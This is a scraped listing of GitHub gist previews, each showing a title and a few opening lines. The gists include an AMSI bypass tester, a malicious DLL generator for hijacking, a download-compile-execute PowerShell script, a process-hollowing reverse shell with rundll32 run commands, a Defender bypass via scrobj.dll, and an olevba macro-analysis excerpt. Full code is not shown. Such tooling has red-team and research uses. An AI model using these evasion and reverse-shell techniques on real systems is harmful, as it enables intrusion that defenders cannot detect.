This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // os-labs.cpp | |
| // | |
| #include <iostream> | |
| #include <iomanip> | |
| #include <windows.h> | |
| #include <algorithm> | |
| #include <stdio.h> |
r00t-3xp10it
/ NoAmsi.ps1
Last active
April 29, 2022 15:48
NoAmsi - Test AMSI bypasses or simple execute one AMSI bypass technic!
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .SYNOPSIS | |
| Test AMS1 string bypasses or simple execute one bypass technic! | |
| Author: r00t-3xp10it | |
| Tested Under: Windows 10 (19042) x64 bits | |
| Required Dependencies: none | |
| Optional Dependencies: none | |
| PS cmdlet Dev version: v2.6.15 | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //compile with | |
| // C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | |
| using System; | |
| using System.Collections.Generic; | |
| using System.Linq; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| using System.Threading.Tasks; |
klezVirus
/ evilldll-gen.sh
Last active
July 6, 2024 08:32
Simple Malicious DLL Generator for DLL Hijacking Attacks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| usage(){ | |
| echo "# ################# Simple CPP to DLL Utility ################# #" | |
| echo "# This tool has been maded to easily generate and compile a DLL to be used for DLL hijacking.#" | |
| echo "# #" | |
| echo "# ========================================================================================== #" | |
| echo "# #" | |
| echo "# Usage: #" | |
| echo "# ./dll-gcc [Options] <input-file> #" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .SYNOPSIS | |
| Download\Compile\Execute CS scripts On-The-Fly! | |
| Author: @r00t-3xp10it | |
| Tested Under: Windows 10 (18363) x64 bits | |
| Required Dependencies: Microsoft.NET {native} | |
| Optional Dependencies: BitsTransfer {native} | |
| PS cmdlet Dev version: v1.3.7 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #RC4 encryption implementation using Java Crypto API | |
| #Author: @_EthicalChaos_ | |
| import javax.crypto.spec.*; | |
| import java.security.*; | |
| import javax.crypto.*; | |
| # $1 = plaintext, $2 = key | |
| sub encryptRC4{ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| document.getElementById("problem_content").getElementsByTagName('embed')[0].addEventListener('DOMContentLoaded', (event) => { | |
| old_url = document.getElementById("problem_content").getElementsByTagName('embed')[0].getAttribute('src') | |
| new_url = 'http://'+window.location.hostname+'/PDF'+old_url.split('/PDF')[1] | |
| var emb = document.getElementById("problem_content").getElementsByTagName('embed')[0] | |
| var clone=emb.cloneNode(true); | |
| clone.setAttribute('src',new_url); | |
| emb.parentNode.replaceChild(clone,emb); | |
| }) |
FrankSpierings
/ process-hollow-shell-dll.c
Last active
July 11, 2024 06:23
Reverse shell which uses process hollowing technique
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // docker run -it --rm -v `pwd`:/tmp/building ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll" | |
| // | |
| // Use -DDEBUG at compile time, for the logging printf messages. | |
| // Use -DNON_MS_DLL_BLOCK at compile time, to block injection of non Microsoft DLL's into the host process. | |
| // Use -DWAITFOR at compile time, to wait for the host process to finish. | |
| // | |
| // Run: | |
| // rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 | |
| // rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe | |
| // rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools | |
| =============================================================================== | |
| FILE: e440eb7774fc2b06f56e5bc627e0d5d1d656fdd73713e6d3c274369d9cb60223 | |
| Type: OpenXML | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO Sheet1.cls | |
| in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet1' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| Dim isR As Boolean |
0xlane
/ scrobj-call-csharp.cs
Created
October 12, 2020 14:59
Call scrobj.dll in .net env without regsvr32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * Author: REInject | |
| * Usage: scrobj-call-csharp.exe http://127.0.0.1/test.sct | |
| * Link: https://scriptboy.cn/p/using-scrobj-without-regsvr32-bypass-defender/ | |
| */ | |
| using System; | |
| using System.Runtime.InteropServices; | |
| using System.ComponentModel; |
NewerOlder